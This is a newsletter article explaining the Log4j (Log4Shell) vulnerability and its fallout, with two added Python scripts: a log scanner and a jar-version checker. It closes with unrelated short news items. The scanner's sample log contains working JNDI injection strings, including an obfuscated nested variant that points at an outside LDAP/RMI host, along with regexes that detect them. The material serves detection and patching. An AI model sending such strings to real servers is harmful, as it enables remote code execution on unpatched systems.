A mild-mannered bit of code has the Internet in an uproar.
On December 9th, security researchers identified a vulnerability in Log4j, a Java library within the open-source Apache logging framework; the vulnerability itself has been nicknamed Log4Shell. Log4j lets applications capture and record their activity in log files.
What happened is that researchers discovered that this code can be exploited: someone can send a malicious string of text to a server, or change a device name to include the string. When the server receives that request, or when the device pings the server, the string gets written to the server logs just like any other legitimate entry. Because Log4j interprets certain patterns in the text it logs rather than simply storing them, sending such a string to an unpatched server could allow whoever sent it to gain access to that server, either to review information or to plant their own code.
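The string-in-the-logs mechanism just described is also what defenders look for in their own server logs. The scanner below is an added example, not code from this article or from the Apache project: it flags any request line carrying a Log4j "${jndi:...}" lookup, the published indicator of an exploitation attempt against this vulnerability, and any nested "${...${" lookup, the form attackers use to disguise the same thing. The access-log lines and addresses it runs over are constructed for the example, not real captures.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Log4j lookup syntax is "${name:args}". A lookup named "jndi" is the published
# indicator of an exploitation attempt against the Log4j vulnerability above.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# A "${" that appears before the previous "${...}" has closed is a nested lookup.
# Nesting is how the word "jndi" gets hidden from naive matching, and legitimate
# request data almost never contains one, so nested lookups are flagged as well.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")


def classify_line(line: str) -> Optional[str]:
    """Return a verdict for one log line, or None when nothing suspicious is present."""
    if JNDI_LOOKUP.search(line):
        return "jndi-lookup"
    if NESTED_LOOKUP.search(line):
        return "nested-lookup"
    return None


def scan_log(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Scan log lines and return (line_number, verdict, line) for each flagged line."""
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(lines, start=1):
        verdict = classify_line(line)
        if verdict is not None:
            hits.append((lineno, verdict, line.rstrip("\n")))
    return hits


# Constructed sample web-server access log. Addresses come from the reserved
# documentation ranges; the request strings are shaped like the attempts that
# security vendors reported, not real captures.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [11/Dec/2021:03:14:10 +0000] "GET /?x=${${lower:j}ndi:rmi://198.51.100.7/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.12 - - [11/Dec/2021:03:14:11 +0000] "GET /price?amt=${total} HTTP/1.1" 200 88 "-" "app/1.0"',
]

if __name__ == "__main__":
    # Lines 2 and 3 are reported; the single, un-nested "${total}" on line 4 is not.
    for lineno, verdict, line in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {verdict}: {line}")
```

Run it over a real access or application log by passing the file object to scan_log. A hit tells you someone tried; whether the attempt succeeded depends on the Log4j version behind that endpoint, which is a separate check.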
Security researchers sounded the alarm because of the havoc this exploit may cause if companies don’t immediately patch their systems. According to Wired, Free Wortley, CEO of data security company LunaSec, called Log4j “a design failure of catastrophic proportions.”
Why is this a big deal? Companies that don’t update the code on their servers leave themselves open to attack. This, in turn, could impact your ability to access information online, order products, or use an app on your phone. And all of this could cost a company millions of dollars in lost revenue. But in a worst-case scenario, if a malicious actor gained access to critical servers, they could cripple an already overburdened supply chain, create havoc at hospitals, or impact electrical grids, water supplies, and other essential services.
The problem is particularly noteworthy because the code, and the ability to insert a malicious string, already exists in software products created by major companies (such as Oracle, IBM, Amazon Web Services, Microsoft, and Google). Researchers discovered that cloud services like Steam and many popular games like Minecraft are vulnerable as well.
Brian Fox of security company Sonatype suggested to the BBC that this exploit of corporate servers is “akin to someone figuring out that mailing a letter into your postbox, with a specific address written on it, allows them to open all your doors in your house.”
One security researcher posted a redacted image on Twitter showing how easy it was to run an exploit on an iPhone by simply changing the name in the settings to a new string, which then triggered a response (a ping) from Apple servers.
Another researcher was able to accomplish a similar action with Tesla.
And despite all of the warnings, the use of this exploit has spread like wildfire. Online security provider Check Point noted that they have prevented over 1.25 million attempts to exploit this vulnerability while security experts at Sophos say they have “already detected hundreds of thousands of attempts since December 9 to remotely execute code.”
Even the U.S. Government is sounding the alarm. Jen Easterly, Director of the Cybersecurity and Infrastructure Security Agency (CISA), said on December 13 that the Log4j exploit is “one of the most serious I’ve seen in my entire career, if not the most serious.” In a separate statement, she also said the government is doing everything it can to mitigate the fallout, and in light of news that some state actors are attempting to use the exploit, ZDNet reported that the agency has ordered all civilian federal agencies to patch their systems by December 24.
How to stop Log4j from breaking the Internet
The good news is that many companies are already applying patches to their systems and products. For example, Amazon published an update about their efforts to protect AWS servers and Google Cloud issued a security advisory.
The real concern is with smaller companies that may not be running the most up-to-date software and may not be monitoring their security closely. Although the Apache Software Foundation has released two patches for the library so far, each company that ships Log4j needs to ensure the patch is applied within its own products, and then the individuals and companies using those products need to update their software.
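Finding which of your own products still ship an old copy of the library is the first step in the patching the paragraph describes. The script below is an added example, not from the article or the Apache project: it walks a directory for .jar files, reads each jar's manifest and compares the version it declares against a minimum you supply. It assumes log4j-core jars carry an Implementation-Title of "Apache Log4j Core" and an Implementation-Version entry in META-INF/MANIFEST.MF (the usual Maven layout); the minimum version is a placeholder because the article names no version number, and the jars scanned in the demo are constructed stand-ins.

```python
import io
import os
import zipfile
from typing import Dict, Iterator, Optional, Tuple

# Class inside log4j-core that performs the JNDI lookup. Its presence identifies a
# copy of the library even when the manifest is missing. (Path from the library's
# layout, not from the article.)
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_manifest(text: str) -> Dict[str, str]:
    """Parse a jar MANIFEST.MF into a dict; continuation lines start with a space."""
    entries: Dict[str, str] = {}
    last_key: Optional[str] = None
    for raw in text.splitlines():
        if raw.startswith(" ") and last_key is not None:
            entries[last_key] += raw[1:]
        elif ":" in raw:
            key, value = raw.split(":", 1)
            last_key = key.strip()
            entries[last_key] = value.strip()
    return entries


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.14.1' into (2, 14, 1) so versions compare numerically, not as strings."""
    parts = []
    for piece in version.split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def inspect_jar(data: bytes) -> Dict[str, object]:
    """Read a jar from memory and report what it says about itself."""
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        names = set(jar.namelist())
        manifest: Dict[str, str] = {}
        if "META-INF/MANIFEST.MF" in names:
            raw = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            manifest = parse_manifest(raw)
    return {
        "title": manifest.get("Implementation-Title", ""),
        "version": manifest.get("Implementation-Version", ""),
        "has_jndi_lookup": JNDI_LOOKUP_CLASS in names,
    }


def assess(info: Dict[str, object], min_version: str) -> str:
    """Verdict for one jar: 'not-log4j-core', 'vulnerable' or 'patched'."""
    is_core = "log4j core" in str(info["title"]).lower() or bool(info["has_jndi_lookup"])
    if not is_core:
        return "not-log4j-core"
    # A copy of log4j-core with no declared version is treated as unpatched.
    version = str(info["version"])
    if not version or parse_version(version) < parse_version(min_version):
        return "vulnerable"
    return "patched"


def scan_tree(root: str, min_version: str) -> Iterator[Tuple[str, str]]:
    """Walk a directory and yield (path, verdict) for every .jar file found."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(".jar"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    yield path, assess(inspect_jar(fh.read()), min_version)


def build_fake_jar(version: str, include_jndi_lookup: bool) -> bytes:
    """Constructed stand-in for a log4j-core jar so the scanner can run offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(
            "META-INF/MANIFEST.MF",
            "Manifest-Version: 1.0\nImplementation-Title: Apache Log4j Core\n"
            f"Implementation-Version: {version}\n",
        )
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


if __name__ == "__main__":
    import tempfile
    # Placeholder: the article gives no version number, so set this to the
    # release Apache currently recommends before scanning real systems.
    MIN_SAFE_VERSION = "2.99.0"
    with tempfile.TemporaryDirectory() as tmp:
        for ver, jndi in (("2.14.1", True), ("2.99.0", True)):
            with open(os.path.join(tmp, f"log4j-core-{ver}.jar"), "wb") as fh:
                fh.write(build_fake_jar(ver, jndi))
        for path, verdict in scan_tree(tmp, MIN_SAFE_VERSION):
            print(f"{verdict:15s} {path}")
```

Point scan_tree at an application's lib directory to get one verdict per jar. The check only covers plain jar files on disk; copies bundled inside other archives or shipped under a vendor's own name need the vendor's advisory, which is exactly the gap the paragraph warns about.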
As Wired noted, “Less fastidious organizations or smaller developers who may lack resources and awareness will be slower to confront the Log4Shell threat.”
Another thing that worries security experts is the potential hesitancy to deal with the problem. “We’re seeing a lot of enterprises afraid to patch without testing,” Jake Williams, an incident responder and former NSA hacker, told Wired. “That’s the wrong approach in this case.”
Even if you don’t write code, you still have a role to play in mitigating the damage from Log4j. Make sure your devices are running the most current operating system and that all of your individual applications are up-to-date.
For anyone wanting (or needing) to learn more, in the spirit of crowdsourcing solutions, Tech Solvency has a detailed page explaining the issues, linking to multiple technical analysis sites, offering tips for detection and remediation, and providing a list of all sites affected so far and their status.
In other news
- The State of the Word for WordPress. Each year Matt Mullenweg, co-founder of WordPress and CEO of Automattic, delivers a keynote address known as the State of the Word discussing all things WordPress. This year, Mullenweg explored the past year of WordPress initiatives and highlighted features coming in WordPress 5.9, including new block functionality and full-site editing. He also covered broader topics affecting the tech landscape, including Web 3.0 and the decentralized web, mergers and partnerships, and the growth of open source as a software of choice. Watch the official State of the Word 2021 recording including a lively interactive question and answer session, or discover what has the WordPress community talking over on Twitter #ILoveWP.
- 200 newspapers are suing the search and social giants. Google and Facebook have been undermining local newspapers by manipulating the digital ad market, according to a new lawsuit. A group of 30 newspaper companies operating hundreds of newspapers want to recover past damages as well as establish a new system in which they can thrive. Their complaint echoes many of the antitrust suits filed against Google, but there are some significant differences between their claims and what was asserted in previous litigation. WPTavern noted that many of the small newspapers in this consolidated lawsuit have used WordPress (or something similar) for years, and these lawsuits allege that AMP pages brought 40% less revenue to publishers — suggesting an algorithm disparity between their platforms is at play here.
- A vaccine for aging to treat disease. The Japan Times reports a team of Japanese scientists has developed a vaccine designed to halt aging. As cells age they drive problems such as arterial stiffening and the spread of age-related diseases, but the vaccine enables the body to counter the process. The scientists isolated a protein from what’s known as senescent, or ‘zombie,’ cells to make the vaccine. Once injected, the body removes damaged cells instead of letting them continue to age. The Japan Times reports the Juntendo University team hopes to use the vaccine to halt the progress of diseases including diabetes, arterial conditions, and cancer.
- Plant-based glitter won’t rain pollution on your parade. Nothing brightens up a celebration quite like throwing huge handfuls of glitter. However, glitter often ends up suspended in the air or raindrops, scattered across the landscape, and buried deep in our oceans. Researchers at the University of Cambridge may have a solution to the glitter problem: a biodegradable version using cellulose that’s made using less energy. When cellulose, a substance found in plant walls, is assembled into crystals, it reflects light just like glitter, and could be easily extracted from materials that would otherwise be trash, like wood pulp, fruit skins, and coffee grounds. Figuring out how to get these microscopic crystals to assemble into vibrant colors in large quantities is tricky, so it may be a few more years before plant-based glitter becomes a staple at your local Pride parade.
- A camera the size of a grain of salt. Who would have thought that cameras could be this small? That’s right, the latest to appear is incredibly tiny — the same size as a grain of salt. It produces quality images with no blur or distortions. With 1.6 million cylindrical posts on its surface, it manages to capture full-color photos similar to high-quality lenses half a million times bigger. Computer software uses machine learning techniques and other signal processing algorithms to reduce digital distortion without losing any sharpness or reducing image resolution. No word yet on how soon it will be before you just sprinkle these cameras on your scrambled eggs prior to your next colonoscopy.
- High-tech, Finnish-style. What do you get when you combine advanced GPS, solar tech, cold weather, outboard motors, and saunas? A giant ice carousel, of course! Finnish inventor Janne Käpylehto set his summer cottage free by carving out a massive circle in the ice and then spun lights and a portable sauna in circles around it.
Tip of the week
As more devices connect to the Internet, keeping your apps and firmware updated is crucial. Most devices have an auto-update setting, but it won’t always work as promised. To minimize your risk of threats, set a bi-weekly appointment on your calendar to check for updates on all devices.
Start by checking for app updates on your smartphone and computer. Next, look for operating system updates. Don’t forget your virus software! Then check your streaming stick, tablet, e-reader, activity tracker, and smartwatch. Have a website? Check for updates to your CMS and WordPress plugins, and don’t forget to create a backup. Treat this appointment with the highest priority, and you’ll be much less vulnerable to hacks.
[NEWS] Online security threat Log4j is small but mighty.